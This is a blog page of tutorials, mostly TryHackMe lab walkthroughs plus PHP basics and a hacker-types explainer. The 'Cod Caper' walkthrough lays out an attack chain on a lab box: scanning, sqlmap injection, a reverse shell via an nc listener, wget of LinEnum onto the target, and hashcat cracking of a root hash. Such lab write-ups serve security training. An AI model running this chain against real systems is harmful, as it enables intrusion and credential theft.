-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • TryHackMe Advent of cyber Day 9 Task 14 walkthrough



    TryHackMe Advent of cyber Day 9 Task 14 walkthrough



    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe Advent of cyber Day 9 Task 14 walkthrough


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.






     tryhackme rp nmap






    TryHackMe :- Click Here




    Day Nine — Requests



    Day 9 brings us our first scripting challenge. We’re given access to a public IP VM (on the THM network, so remember to use OpenVPN!) located at 10.10.241.214 or 10.10.112.87 and are told that it runs a webserver on Port 3000. We’re also told that the root directory of the webpage serves a file containing the JSON object: {"value":"s","next":"f"} , which gives us a value and the location of the next value. The support material for today’s challenge is once again a Google Doc. I’ve provided a step-by-step tutorial for building today’s script, and there’s a screenshot of the finished program at the end of the Day 9 write-up.
    TryHackMe Advent of cyber Day 9 Task 14



    Despite being told that the file just contains a single JSON object, I think it’s worth just checking for ourselves.



      curl http://10.10.169.100:3000 


    But if using a web browser is preferable then that works too (note that the browser is displaying the data as a table — switch to the Raw Data tab to see what the website will actually send if request data from it):






    TryHackMe Advent of cyber Day 9 Task 14 walkthrough






    As I understand it, a lot of people just did this challenge manually; however, it’s a lot more fun (not to mention quicker and more reliable) to do it with a simple script, so that’s what we’re doing.


    Get your favourite text editor up and make a new Python ( .py ) file. If you don’t have Python installed then download it from here if you’re running Windows or Mac. Most flavours of Linux already have Python installed, but if you prefer using an IDE to code then it’s worth downloading IDLE or Visual Studio code.


    We’ll go through this line by line, and I’ll post a screenshot of the finished file when we get to the end.





    The first thing we need to do is import the requests library:


    import requests


    The requests library is used to send HTTP requests and receive responses. For this program that’s all we need it to do: send and receive.


    The next thing we’re going to do is setup global variables for the host and path of the domain:


    path = "/"
    host = "http://10.10.169.100:3000"

    These will be used during the actual requests stage — for the time being our path is just the root directory because we know that’s where the first JSON object is.

    We also want to make an (empty) global array to store our answers in:



    values = []


    We know from the challenge description that we’re being asked to keep following the trail of JSON objects until we reach one that is {"value":"end","next":"end"} — in other words, we want to keep going until the next path in the list is /end .


    Let’s set up a while loop to do this:



    while path != "/end":


    From this point on indentation is extremely important as the Python interpreter uses it to determine which lines are part of which statement. Everything inside the while loop has to have a single tab before it.

    The next thing we need to do is request some information from the server:



    response = requests.get(host+path)


    This makes a GET request to the website and stores the response in a variable called response.

    The next line we need is:


    json_response = response.json()



    Without going into too much detail, this line analyses the response for JSON data and sets it (as a dictionary) to a variable called json_response.

    We now have our JSON object saved as a Python dictionary with key-value pairs. Right now our dictionary looks like this:






    TryHackMe Advent of cyber Day 9 Task 14 walkthrough




    So, we have our data in a readable format. What are we going to do with it now?

    The first thing we need to do is update our path variable so that the program knows where to look next:


    path = "/" + json_response["next"]

    This is setting the path variable equal to a forward slash, followed by the value stored with the “next” key from the dictionary we requested. After the first iteration of our loop, the path variable would look like this:



    /f


    because “f” was the letter stored in the first dictionary “next” key.

    We also want to add the value to our list of values — but only if the value isn’t end :


     

    if path != "/end":
            values.append(json_response["value"])




    We already decoded the “next” value and set it to the path, so if we test path to be equal to /end we know that the next value was “end”. In the above statement, if the path is anything other than /end the value in the “value” key of the dictionary will get added to our list of values.


    Finally (outside the while loop), we use:


    print("".join(values))


    which outputs the values array (joined together as a string) to give us our answer to the only question for Day9. The final program should look like this:



    Full Program



    #!/usr/bin/python3

    import requests
    path = "/"
    host = "http://10.10.169.100:3000"
    values = []

    while path != "/end":
       response = requests.get(host+path)
       json_response = response.json()
       path = "/" + json_response["next"]
       if path != "/end":
            values.append(json_response["value"])
    print("".join(values))




    When we run the program, we should be given our sole answer for the day:







    TryHackMe Advent of cyber Day 9 Task 14 walkthrough



    python request.py





      Program returns the flag




    Video Tutorial :-



       


    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)







  • PHP The switch Statement


    PHP The switch Statement


    PHP - The switch Statement



    If you want to select one of many blocks of code to be executed, use the Switch statement.

    The switch statement is used to avoid long blocks of if..elseif..else code.PHP The switch Statement


    Syntax


    switch (expression)
    {
       case label1:
          code to be executed if expression = label1;
          break;  
       
       case label2:
          code to be executed if expression = label2;
          break;
          default:
       
       code to be executed
       if expression is different 
       from both label1 and label2;

    }





    Example



    The switch statement works in an unusual way. First it evaluates given expression then seeks a lable to match the resulting value. If a matching value is found then the code associated with the matching label will be executed or if none of the lable matches then statement will execute any specified default code.








    $d = date("D");
           
             switch ($d)
    {

                case "Mon":
                   echo "Today is Monday";
                   break;
             
                case "Tue":
                   echo "Today is Tuesday";
                   break;
             
                case "Wed":
                   echo "Today is Wednesday";
                   break;
             
                case "Thu":
                   echo "Today is Thursday";
                   break;
             
                case "Fri":
                   echo "Today is Friday";
                   break;
             
                case "Sat":
                   echo "Today is Saturday";
                   break;
             
                case "Sun":
                   echo "Today is Sunday";
                   break;
             
                default:
                   echo "Wonder which day is this ?";
             }
     




    ?>



    </body>
    </html>





    Today is wednesday










    PHP - The if..ifelse...elseif Statement


    The switch statement will be explained in the next chapter. ( Click Here )



    Video on This Topic :- Soon


    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)





  • What is Hacking and what is Ethical Hacking, is it Legal or Illegal.






    What is Hacking and what is Ethical Hacking, is it Legal or Illegal.
    What is Hacking? I welcome you to my blog. guys, I try to make the post written by me hundred percent correct. So that you can get the correct information and make it easy to read. Today's topic is related to hacking. So guys, today we will know what hacking is. What are the types of hackers. How is hacking done?



    What is Hacking? 



    I welcome you to my blog. Friends, I try to make the post written by me hundred percent correct. So that you can get the correct information and make it easy to read. Bahral, ​​we go to our topic. Today's topic is related to hacking. So friends, today we will know what hacking is. What are the types of hackers. How is hacking done? What is Hacking and what is Ethical Hacking, is it Legal or Illegal.


    Nowadays the use of Computer and Smartphone is increasing very fast. It is almost impossible for people to do their work without Smartphone and Computer. Whether it is own business or working in a company / bank.


    Computer is used everywhere, computer is used for doing small work.


    Many problems have to be faced while doing the same work, in such a situation, when we are talking about computers, then the matter of cyber crime also becomes necessary.


    Friends, you must have heard about Cyber ​​Crime. If you have not heard, then I want to tell that Cyber ​​Crime is a type of crime in which hackers steal personal details or data of others using computers. Due to which people suffer heavy losses. And blackmail them and grab lakhs of rupees. Due to cyber crime many organizations have to pay crores of rupees every year due to their data being stolen.


    In the computer world, where the crime is not taking the name of stopping, how to protect the people of Longo from the files kept in their -2 computers and the data of the company and Bussiness from being hackers. So friends, we will give you the answer to this question in this post. So, you must read this article about






    what is hacking?



    Hacking means to find a weakness in a computer's system and take advantage of that weakness and hack that system. The person or person who does this Hacking, we call it Hacker. A Hacker has all kinds of knowledge related to computer, that is why he can easily hack Valunerbility from someone's computer system. On hearing the name, we realize that this is a wrong thing.


    Types Of Hacking


    Network Hacking

    This type of Hacking means that it receives all the information over the Hacker Network itself, for which many tools are available such as -Telnet, NS, Lookup, Ping, tracert, Netstat etc. Its main purpose is only to reach the network system and its operation.
    Website Hacking

    In website hacking illegally gaining control over the association of its web server and website, ie Database or Interface.

    Email Hacking


    In email hacking, Hacker creates a duplicate Phishing page, reaches the user to that phishing page, if the user puts information in it then the Email ID gets hacked. It is used in illegal works in an unauthorized manner.

    Ethical Hacking


    This type of Hacking goes into many ethical tasks. In this Hacking, First Owner's Permission is taken by hacker to find Weakness in the system and Owner is helped in removing these Weakness.


    Password Hacking 

     
    In this type of Hacking, passwords are cracked in an unauthorized manner, in which the system is hacked by stealing secret passwords kept in the computer.

    Computer System Hacking


    In this type of hacking, the hacker knows the ID and password of a computer's system and uses the computer illegally by sequre connection to it.

    He deletes 2 files sitting at one place and also steals the data. hacking news


    See Also


    For More information :- Click Here

    CEH v10 ( website ) :- Click Here

    CEH V10 ( Videos ) :- Click Here

    CEH V10 ( Videos ) :- Click Here



    What are the types of hackers?



    1. Black Hat Hacker

    Black Hat Hacker illegally gain the ID and password of your website, Computer System, Android Smartphone, Facebook etc. without your permission.

    And assert their authority over the information kept in them. Whether he deletes them or demands a ransom from the owner, Black Hat Hacker is very bloodthirsty. They do not hesitate at all to harm others. Ethical Hacking, is it Legal or Illegal.



    2. White Hat Hacker

    White Hat Hacker does hacking in an ethical way. Hackers of this category provide protection to our system, website and smartphone from being hacked. Such hackers take permission from the owner of the system and help us in protecting from the attacker. White hat hacker check the security of our website or system. This tells whether the system is a sequer or not. Finds weakness and provides sequrity. It is also called ethical hacker.



    3. Gray Hat Hacker
    Gray Hat Hacker is actually in a state of confusion. They may or may not play with anyone without permission. By the way, it can hack anyone's system to improve their skills, but they do not cause any harm but they cannot be called a white hat hacker and not a black hat hacker.





    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)




  • PHP decision making if else elseif statements


    PHP decision making if else elseif statements




    Conditional statements are used to perform different actions based on different condtions. The if, elseif ...else statements are used to take decision based on the different condtion.

    You can use conditional statements in your code to make your decision. In PHP we have the following conditional statements:

    • if statement - executes some code if one condition is true






    • if...else statement - executes some code if a condition is true and another code if that condition is false
    • if...elseif...else statement - executes different codes for more than two conditions
    • switch statement - selects one of many blocks of code to be executed




    PHP - The if Statement


    The if statement executes some code if one condition is true.


    Syntax

    if (condition) {
      code to be executed if condition is true;
    }



    Example 



    $b = date("H");

    if ($b < "30") 
    {

      echo "Have a good day!";


    }


    ?>



    </body>
    </html>





    Have a good day!









    PHP - The if...Else Statement


    If you want to execute some code if a condition is true and another code if a condition is false, use the if....else statement. PHP if else elseif statements


    Syntax

    if (condition)
       code to be executed if condition is true;
    else
       code to be executed if condition is false;


    Example


    The following example will output "Have a nice weekend!" if the current day is Friday, Otherwise, it will output "Have a nice day!":


    Example 



       $d = date("D");
             
             if ($d == "Mon")
    {
                echo "Have a nice vacation!"; 
             } 
             else 
    {
                echo "Have a nice day!"; 
    }  


    ?>



    </body>
    </html>




    Have a nice vacation!





    The ElseIf Statement


    If you want to execute some code if one of the several conditions are true use the elseif statement.PHP decision making if else elseif statements


    Syntax


    if (condition)
       code to be executed if condition is true;
    elseif (condition)
       code to be executed if condition is true;
    else
       code to be executed if condition is false;



    Example


    The following example will output "Have a nice weekend!" if the current day is Friday, and "Have a nice Sunday!" if the current day is Sunday. Otherwise, it will output "Have a nice day!" −



    Example 



       $d = date("D");
             
             if ($d == "Fri")
    {
                echo "Have a nice weekend!";
             }
             elseif  ($d == "Sun") {
                echo "Have a nice Sunday!"; 
             }
             else {
                echo "Have a nice day!"; 
          
      
    }

    ?>



    </body>
    </html>




    Have a nice day!




    PHP - The switch Statement


    The switch statement will be explained in the next chapter. ( link will be updated soon )



    Video on This Topic :- Soon


    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • TryHackMe The Cod Caper Walkthrough





    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe The Cod Caper Walkthrough


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.






     tryhackme rp nmap






    TryHackMe :- Click Here


    [Task 1] Intro


    Hello there my name is Pingu. I've come here to put in a request to get my fish back! My dad recently banned me from eating fish, as I wasn't eating my vegetables. He locked all the fish in a chest, and hid the key on my old pc, that he recently repurposed into a server. As all penguins are natural experts in penetration testing, I figured I could get the key myself! Unfortunately he banned every IP from Antarctica, so I am unable to do anything to the server. Therefore I call upon you my dear ally to help me get my fish back! Naturally I'll be guiding you through the process. TryHackMe The Cod Caper Walkthrough

    Note: This room expects some basic pen testing knowledge, as I will not be going over every tool in detail that is used. While you can just use the room to follow through, some interest or experiencing in assembly is highly recommended




    Ans :- No Needed



    [Task 2] Host Enumeration



    The first step is to see what ports and services are running on the target machine.


    Recommended Tool - nmap:


    Useful flags:


    -p :- Used to specify which port to analyze, can also be used to specify a range of ports i.e -p 1-1000



    -sC :- Runs default scripts on the port, useful for doing basic analysis on the service running on a port


    -A :- Aggressive mode, go all out and try to get as much information as possible



    #1 How many ports are open on the target machine?


    nmap 10.10.191.14





    Ans :- 2




    #2 What is the http-title of the web server?


    nmap -sC 10.10.191.15



     

    Ans :- Apache2 Ubuntu Default Page: it works





    #3 What version is the ssh service?









    nmap -sV 10.10.191.15





    Ans :- OpenSSH 7.2p2 Ubuntu 4ubuntu2.8




    #4 What is the version of the web server?


    nmap -A 10.10.191.15





    Ans :- Apache/2.4.18


    [Task 3] Web Enumeration


    Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available to access on the web server.


    Recommended tool: gobuster


    Useful flags: 

    -x :- Used to specify file extensions i.e "php,txt,html"


    --url :- Used to specify which url to enumerate


    --wordlist :- Used to specify which wordlist that is appended on the url path i.e


    "http://url.com/word1"

    "http://url.com/word2"

    "http://url.com/word3.php"




    #1 What is the name of the important file on the server?


    gobuster -x .txt,.php,.html dir -u http://10.10.237.242 -w /usr/share/wordlists/dirb/common.txt











    ANS :- administrator.php




    [Task 4] Web Exploitation


    The admin page seems to give us a login form. In situations like this it is always worth it to check for "low-hanging fruit". In the case of login forms one of the first things to check for is SQL Injection.


    Recommended Tool: sqlmap

    Useful Flags:


    -u :- Specifies which url to attack

    --forms :- Automatically selects parameters from <form> elements on the page

    --dump :- Used to retrieve data from the db once SQLI is found

    -a :- Grabs just about everything from the db



    #1 What is the admin username?


    sqlmap -u http://10.10.110.216/administrator.php --dbs --forms










    pingudad


    #2 What is the admin password?






    secretpass


    #3 How many forms of SQLI is the form vulnerable to?







    Task 5: Command Execution



    In the previous task we get the login page and using the sqlmap we get the username and password after successful login we’ll the screen like this.


    And is a vulnerable to command execution.









    After login, we have a command prompt it seems we have got the ability to run commands. We executed a command “id” and we got the right result so we tried to execute python reverse shell after executing command we got a reverse shell.




    Now we’ll the run the nc on our system to get the reverse shell of target machine.


    Payloads are given in the link provided in the description of the task


    #nc -lnvp 4444


    Here my machine will listen to the target machine on the port no. 4444


    Now one by one we’ll check the payload by running it on the command column on the above image


    Before running the payload modify the IP add and Port


    Port will be 4444

    Ip add will be on the access page of the THM (Internal Virtual IP add)


    Luckily I got the reverse shell on running the first perl payload on this page


    https://highon.coffee/blog/reverse-shell-cheat-sheet/


    Now on further enumeration, you’ll get the password in the hidden directory .


    You will find the in /var/hidden/pass directory by using find command


    #find -name pass -type f



    Task 6: LinEnum



    Step1: Prepare the Script on Your Attack Machine


    # mkdir linenum

    # cd linenum/
    LinEnum and its script can be found on GitHub


    #wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

    #python -
    m SimpleHTTPServer 4444




    Step2: Download the Script on the Target Machine


    Login as SSH on the target machine


    #ssh pingu@<IP>

    pingu@ubuntu$ cd /tmp

    pingu@ubuntu$ wget <IP>:4444/LinEnum.sh

    pingu@ubuntu$ ls -la

    pingu@ubuntu$ chmod +x LinEnum.sh

    pingu@ubuntu$ ls -la

    pingu@ubuntu$ ./LinEnum.sh



    Now look for the SUID files in the results.


    Task 10: Finishing the Job



    Now we have the hash to crack here i have the given hash to root.txt file


    We’ll use the hashcat for cracking it


    # hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt


    On completing this we’ll have the root password .



    Ans :- love2fish






     ----------------





    Video Tutorial :- 



            


    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.